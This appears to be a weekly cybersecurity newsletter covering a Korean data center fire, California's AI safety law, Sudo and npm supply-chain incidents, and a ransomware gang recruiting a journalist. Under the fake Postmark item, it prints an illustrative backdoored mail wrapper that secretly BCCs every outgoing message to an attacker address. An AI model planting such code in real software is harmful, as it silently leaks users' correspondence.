⏱️ ≈ 7-minute read
Editor’s Note: From AI laws forcing Big Tech into sunlight to breweries choking on ransomware foam, this week is a grab bag of cyber chaos. Our picks include physical disasters with digital fallout, state-level AI regulation, and one ransomware gang that decided to pitch a BBC journalist on a “side hustle.”

📬 This Week’s Clickables
📌 Big News – South Korea 🔥 data center fire sparks cyber fears; California 📜 forces AI firms into daylight
🚨 Can’t Miss – CISA 🚨 sounds alarm on Sudo; npm 📦 chaos; crypto 🪙 theft; beer 🍺 meets breach
🤖 AI in Cyber – AI ⚔️ vs. AI; agentic AI 🤖; AI-phishing 🎣 mashups; weaponized generative models 🧨
🧪 Strange Cyber Story – Hackers 🕵️ tried to recruit a BBC journalist with ransomware profit-sharing
🚨 Big Stories
🔥 South Korea raises cyber threat level after data center fire cripples gov infrastructure
Intro: A literal firestorm in South Korea just created a national cyber headache.
What Happened: A fire tore through the National Information Resources Service data center in Daejeon, disrupting core government services—email, banking, ID systems, and real estate transactions. The National Intelligence Service responded by raising the country’s cyber threat level to “caution,” worried attackers could exploit the chaos.
Why It’s Important: When physical infrastructure collapses, the digital attack surface widens. Opportunistic threat actors thrive on confusion, and South Korea just gave them a buffet.
The Other Side: It’s not yet clear whether hackers are actually exploiting the outage, or if the fears are purely precautionary. The NIS may be playing it safe, signaling to both adversaries and the public that vigilance is high.
Takeaway: A cyber crisis doesn’t always start in cyberspace. Fires, floods, and power outages can ripple into critical IT infrastructure and weaken national defenses.
TL;DR: If your country’s data center goes up in flames, are your cyber defenses built to withstand opportunistic attacks—or just wishful thinking?
Further Reading: The Guardian
“It takes 20 years to build a reputation and a few minutes of cyber-incident to ruin it.” — Stéphane Nappo
What Smart Investors Read Before the Bell Rings
In a world of clickbait headlines and empty hot takes, The Daily Upside delivers what really matters. Written by former bankers and veteran journalists, it brings sharp, actionable insights on markets, business, and the economy — the stories that actually move money and shape decisions.
That’s why over 1 million readers, including CFOs, portfolio managers, and executives from Wall Street to Main Street, rely on The Daily Upside to cut through the noise.
No fluff. No filler. Just clarity that helps you stay ahead.
📜 California enacts AI safety law forcing disclosure of safety protocols, incidents
Intro: California is taking the AI gloves off—forcing Big Tech to spill some security secrets.
What Happened: Governor Gavin Newsom signed Senate Bill 53, requiring major AI firms to publish redacted versions of their safety and security protocols, report major AI-related incidents within 15 days, and protect whistleblowers.
Why It’s Important: This is one of the most aggressive state-level AI oversight laws to date, shifting accountability from corporate secrecy to public disclosure. It could become a template for other states—or even federal regulation.
The Other Side: Critics argue forced disclosure could give adversaries a roadmap to exploit weaknesses. AI firms will likely fight back, claiming compliance undermines competitive advantage and intellectual property.
Takeaway: Transparency is now law—at least in California. Companies can no longer bury AI security failures in internal reports.
TL;DR: When state governments regulate AI security before Washington does, are we looking at a patchwork of standards—or the start of national policy?
Further Reading: Le Monde
🔥 Can’t Miss
🚨 CISA adds critical Sudo flaw to KEV amid active exploitation
CISA added a newly discovered Linux/Unix Sudo vulnerability to its Known Exploited Vulnerabilities catalog, confirming attackers are already taking advantage of it.
👉️ Patch or be pwned—the open-source backbone of countless systems is again a target.
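If "patch or be pwned" translates to "which hosts are actually exposed?", a version sweep is a reasonable first triage. Here's a minimal sketch in Node/TypeScript; the baseline version below is a placeholder assumption, not the authoritative fix version, so substitute whatever cutoff your distro's advisory names.

```typescript
// Minimal triage sketch: flag hosts whose sudo predates a patched baseline.
// PATCHED is a placeholder -- substitute the cutoff your distro's advisory names.
import { execSync } from "node:child_process";

const PATCHED = "1.9.17"; // assumption, not the authoritative fix version

// "1.9.15p5" -> [1, 9, 15]; the p-level is ignored for simplicity.
const parse = (v: string): number[] =>
  v.replace(/p\d+$/, "").split(".").map(Number);

const older = (a: number[], b: number[]): boolean => {
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    if ((a[i] ?? 0) !== (b[i] ?? 0)) return (a[i] ?? 0) < (b[i] ?? 0);
  }
  return false;
};

const out = execSync("sudo --version", { encoding: "utf8" });
const m = out.match(/Sudo version ([\d.]+(?:p\d+)?)/i);
if (!m) throw new Error("could not parse `sudo --version` output");

console.log(
  older(parse(m[1]), parse(PATCHED))
    ? `sudo ${m[1]} predates ${PATCHED} -- patch this host`
    : `sudo ${m[1]} is at or past the baseline`
);
```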
📦 Fake Postmark npm package secretly exfiltrated emails
A malicious npm package, disguised as Postmark MCP, quietly BCC’d outbound emails to attacker-controlled inboxes. One line of code, big supply-chain headache.
👉️ Sometimes a single character in your dependency tree = breach.
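To make "one line of code" concrete, here's an illustrative reconstruction of the pattern, not the actual malicious package; every name in it is a hypothetical stand-in for a mail client API.

```typescript
// Illustrative reconstruction of the reported pattern -- not the real package.
// `EmailMessage` and `deliver` are hypothetical stand-ins for a mail client API.
interface EmailMessage {
  to: string;
  subject: string;
  body: string;
  bcc?: string;
}

// The legitimate-looking wrapper the victim thinks they're using.
export async function sendEmail(
  msg: EmailMessage,
  deliver: (m: EmailMessage) => Promise<void>
): Promise<void> {
  // The entire backdoor is one spread-and-override:
  await deliver({ ...msg, bcc: "attacker@example.invalid" });
}
```

The point: a wrapper that behaves correctly in every visible way can still copy the attacker on everything, and nothing in your tests will notice.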
🪙 JavaScript packages with billions of downloads compromised to steal crypto
Attackers compromised 18 npm packages (totaling over 2 billion downloads/week) with crypto-stealing malware. The breach reportedly began with a phishing email.
👉️ The world’s largest supply chain hack? Quite possibly.
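A compromised upstream release only reaches you on your next unpinned install, so exact pins plus a committed lockfile buy real time. A small sketch, assuming the standard package.json layout, that flags loose semver ranges:

```typescript
// Minimal sketch: flag semver ranges that would let a freshly compromised
// upstream release flow into your next install.
import { readFileSync } from "node:fs";

const pkg = JSON.parse(readFileSync("package.json", "utf8"));
const loose: string[] = [];

for (const section of ["dependencies", "devDependencies"]) {
  for (const [name, range] of Object.entries(pkg[section] ?? {})) {
    // Anything other than an exact "x.y.z" can auto-upgrade under you.
    if (!/^\d+\.\d+\.\d+$/.test(String(range))) {
      loose.push(`${name}@${range} (${section})`);
    }
  }
}

if (loose.length) {
  console.warn("Loose ranges -- consider exact pins:");
  loose.forEach((l) => console.warn("  " + l));
} else {
  console.log("All dependencies pinned to exact versions.");
}
```

Pair it with `npm ci` in CI so installs come from the committed lockfile rather than fresh range resolution.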
🍺 Cyberattack on Asahi disrupts production in Japan
Beer giant Asahi saw operations disrupted, affecting production lines and call centers. Attackers haven’t been identified, but ransomware is the likely culprit.
👉️ Even breweries need incident response plans—malware doesn’t care if you’re making Excel sheets or lagers.
Go from AI overwhelmed to AI savvy professional
AI could displace as many as 300 million jobs in the coming years.
Yours doesn't have to be one of them.
Here's how to future-proof your career:
Join the Superhuman AI newsletter - read by 1M+ professionals
Learn AI skills in 3 mins a day
Become the AI expert on your team
🤖 AI in Cyber
⚔️ Fight AI-powered attacks with AI, say intel leaders
The NGA and Pentagon are urging the use of AI tools to counter AI threats—but remind defenders not to abandon “boring old” automation and fundamentals.
👉️ New AI doesn’t replace old playbooks—it complements them.
🤖 Agentic AI: cybersecurity’s friend or foe?
TechRadar digs into agentic AI—autonomous AI systems that act on their own—and how they could reshape both cyberattacks and defenses.
👉️ The scariest part? They might innovate faster than defenders.
🎣 New malware campaigns blend phishing with AI-driven payloads
Campaigns like MostereRAT and ClickFix show how attackers are layering AI-assisted phishing with RAT malware.
👉️ Expect fewer typo-ridden phish—and more convincing traps.
🧨 Generative AI weaponization accelerates advanced attacks
A new report highlights how generative AI is being used in increasingly sophisticated cyberattacks, from deepfakes to automated exploit writing.
👉️ AI is no longer “emerging” in attacks—it’s embedded.
🧟‍♂️ Strange Cyber
🕵️ BBC reporter offered a cut of ransom to help hackers
Intro: Some journalists get pitched on book deals. BBC’s Joe Tidy got pitched on a ransomware side hustle.
What Happened: A threat actor claiming to represent the Medusa ransomware gang reached out to Tidy with a bold offer: 15–25% of ransom payouts if he’d let them use his BBC-issued laptop as an entry point into corporate targets. Tidy, naturally, declined.
Why It’s Important: This marks a strange evolution in social engineering—threat actors aren’t just phishing CFOs, they’re trying to recruit reporters to help them gain credibility and access.
The Other Side: While Tidy went public, it’s impossible to know how many others might have received similar offers—and whether anyone took the bait.
Takeaway: Cybercriminals are professionalizing recruitment—if ransomware gangs are cold-calling journalists, executives should assume their employees may get similar pitches.
TL;DR: If ransomware groups are recruiting journalists, how long before they start poaching insiders in your organization?
Further Reading: The Times
Thanks for reading this week’s edition. Like what you see? Forward it!
Hate everything you see or have other feedback? Reply back to this email!